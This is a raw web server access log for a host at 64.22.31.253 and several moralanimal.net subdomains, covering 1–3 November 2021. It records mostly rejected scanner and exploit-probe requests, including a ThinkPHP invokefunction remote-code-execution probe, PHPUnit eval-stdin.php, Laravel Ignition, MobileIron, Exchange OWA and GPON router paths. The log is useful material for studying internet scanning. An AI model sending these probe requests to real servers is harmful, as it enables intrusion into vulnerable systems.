[Gzip -] "-" "-" [01/Nov/2021:04:58:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [01/Nov/2021:05:03:14 +0000] 444 - HEAD https 64.22.31.253 "/epa/scripts/win/nsepa_setup.exe" [Client 54.183.8.120] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Nov/2021:05:15:33 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.205.9] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Nov/2021:05:17:29 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Nov/2021:05:19:42 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Nov/2021:05:42:00 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 54.202.93.30] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Nov/2021:05:45:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.219.201.104] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Nov/2021:05:54:54 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.41] [Length 0] [Gzip -] "Go http package" "-" [01/Nov/2021:06:08:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 182.161.66.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" "-" [01/Nov/2021:07:44:49 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.812.0 Safari/535.1" "-" [01/Nov/2021:07:44:49 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3" "-" [01/Nov/2021:07:44:50 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [01/Nov/2021:07:51:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Nov/2021:08:46:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:42 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:44 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:45 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:46 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:48 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:49 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [01/Nov/2021:08:46:50 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:50 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:51 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:51 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:08:46:55 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [01/Nov/2021:09:06:42 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.196.136] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Nov/2021:10:37:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [01/Nov/2021:11:03:43 +0000] 400 - - http localhost "-" [Client 143.244.41.211] [Length 154] [Gzip -] "-" "-" [01/Nov/2021:11:42:02 +0000] 400 - GET http localhost "/ab2g" [Client 143.110.210.123] [Length 154] [Gzip -] "-" "-" [01/Nov/2021:11:42:02 +0000] 400 - GET http localhost "/ab2h" [Client 143.110.210.123] [Length 154] [Gzip -] "-" "-" [01/Nov/2021:12:12:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 36.112.10.102] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" "-" [01/Nov/2021:12:50:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Nov/2021:13:20:42 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.203.87] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Nov/2021:13:22:53 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [01/Nov/2021:14:59:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.201.191] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Nov/2021:15:37:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 188.166.180.163] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99" "-" [01/Nov/2021:15:44:09 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [01/Nov/2021:16:33:15 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [01/Nov/2021:17:47:15 +0000] 400 - GET http localhost "/ab2g" [Client 159.89.119.92] [Length 154] [Gzip -] "-" "-" [01/Nov/2021:17:47:15 +0000] 400 - GET http localhost "/ab2h" [Client 159.89.119.92] [Length 154] [Gzip -] "-" "-" [01/Nov/2021:19:36:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Nov/2021:20:23:07 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:07 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:10 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:10 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:12 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:12 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [01/Nov/2021:20:23:16 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:17 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:17 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:20 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Nov/2021:20:23:23 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [01/Nov/2021:20:51:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.79.169.253] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [01/Nov/2021:22:02:53 +0000] 444 - GET https lndshark.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [01/Nov/2021:22:25:53 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Nov/2021:22:25:53 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Nov/2021:22:25:53 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Nov/2021:22:25:53 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Nov/2021:22:25:53 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Nov/2021:22:25:53 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Nov/2021:23:47:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [01/Nov/2021:23:50:24 +0000] 400 - GET http localhost "/ab2g" [Client 143.244.187.107] [Length 154] [Gzip -] "-" "-" [01/Nov/2021:23:50:24 +0000] 400 - GET http localhost "/ab2h" [Client 143.244.187.107] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:01:18:07 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:01:19:31 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:01:20:14 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [02/Nov/2021:01:53:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.69] [Length 0] [Gzip -] "-" "-" [02/Nov/2021:02:24:26 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.210.133] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Nov/2021:03:28:00 +0000] 444 - GET https guacamole.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [02/Nov/2021:04:16:41 +0000] 444 - GET https 64.22.31.253 "/proxy/network/api/self" [Client 192.168.1.1] [Length 0] [Gzip -] "okhttp/4.9.0" "-" [02/Nov/2021:04:16:42 +0000] 444 - GET https 64.22.31.253 "/api/system" [Client 192.168.1.1] [Length 0] [Gzip -] "okhttp/4.9.0" "-" [02/Nov/2021:05:14:55 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Nov/2021:05:14:55 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.204.110] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Nov/2021:05:17:12 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Nov/2021:05:46:38 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [02/Nov/2021:05:56:33 +0000] 400 - GET http localhost "/ab2g" [Client 159.223.19.160] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:05:56:34 +0000] 400 - GET http localhost "/ab2h" [Client 159.223.19.160] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:06:39:54 +0000] 400 - GET https localhost "/" [Client 161.35.188.242] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:06:40:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 161.35.188.242] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [02/Nov/2021:09:03:34 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [02/Nov/2021:09:14:16 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.204.62] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Nov/2021:09:55:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.250] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [02/Nov/2021:09:55:49 +0000] 400 - GET http 64.22.31.253 "/" [Client 128.14.209.250] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [02/Nov/2021:11:09:04 +0000] 400 - - http localhost "-" [Client 87.251.64.141] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:11:56:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.53.170.243] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Nov/2021:12:12:50 +0000] 400 - - http localhost "-" [Client 87.251.64.141] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:13:15:14 +0000] 400 - - http localhost "-" [Client 87.251.64.141] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:13:21:07 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.195.223] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Nov/2021:13:36:47 +0000] 400 - - http localhost "-" [Client 117.50.6.160] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:13:36:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 117.50.6.160] [Length 252] [Gzip -] "-" "-" [02/Nov/2021:13:36:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 117.50.6.160] [Length 0] [Gzip -] "-" "-" [02/Nov/2021:13:56:51 +0000] 444 - GET https oauth.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [02/Nov/2021:15:03:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.210.77] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Nov/2021:15:31:54 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 107.150.63.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [02/Nov/2021:15:53:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.173.98] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [02/Nov/2021:15:54:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.241.23] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [02/Nov/2021:15:54:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.134.116] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [02/Nov/2021:17:37:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Nov/2021:18:05:06 +0000] 400 - GET http localhost "/ab2g" [Client 137.184.157.122] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:18:05:06 +0000] 400 - GET http localhost "/ab2h" [Client 137.184.157.122] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:18:44:01 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [02/Nov/2021:19:41:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.43] [Length 0] [Gzip -] "-" "-" [02/Nov/2021:19:41:47 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.43] [Length 252] [Gzip -] "-" "-" [02/Nov/2021:19:41:47 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [02/Nov/2021:20:29:42 +0000] 444 - GET https io.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [02/Nov/2021:20:51:25 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Nov/2021:20:51:25 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Nov/2021:20:51:25 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Nov/2021:20:51:25 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Nov/2021:20:51:25 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Nov/2021:20:51:25 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Nov/2021:21:04:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.175] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [02/Nov/2021:21:04:34 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.100.240] [Length 0] [Gzip -] "-" "-" [02/Nov/2021:21:04:35 +0000] 400 - - https localhost "-" [Client 185.220.100.240] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:21:04:36 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.136] [Length 0] [Gzip -] "-" "-" [02/Nov/2021:21:04:44 +0000] 400 - - https localhost "-" [Client 23.129.64.136] [Length 154] [Gzip -] "-" "-" [02/Nov/2021:22:48:17 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.199.15] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Nov/2021:23:07:44 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.201.232] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Nov/2021:23:48:12 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Nov/2021:00:17:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.212] [Length 0] [Gzip -] "-" "-" [03/Nov/2021:00:41:51 +0000] 444 - GET https 64.22.31.253 "/proxy/network/api/self" [Client 192.168.1.1] [Length 0] [Gzip -] "okhttp/4.9.0" "-" [03/Nov/2021:00:41:53 +0000] 444 - GET https 64.22.31.253 "/api/system" [Client 192.168.1.1] [Length 0] [Gzip -] "okhttp/4.9.0" "-" [03/Nov/2021:01:23:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:01:23:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:01:23:39 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:01:23:40 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [03/Nov/2021:01:23:41 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:01:23:42 +0000] 444 - 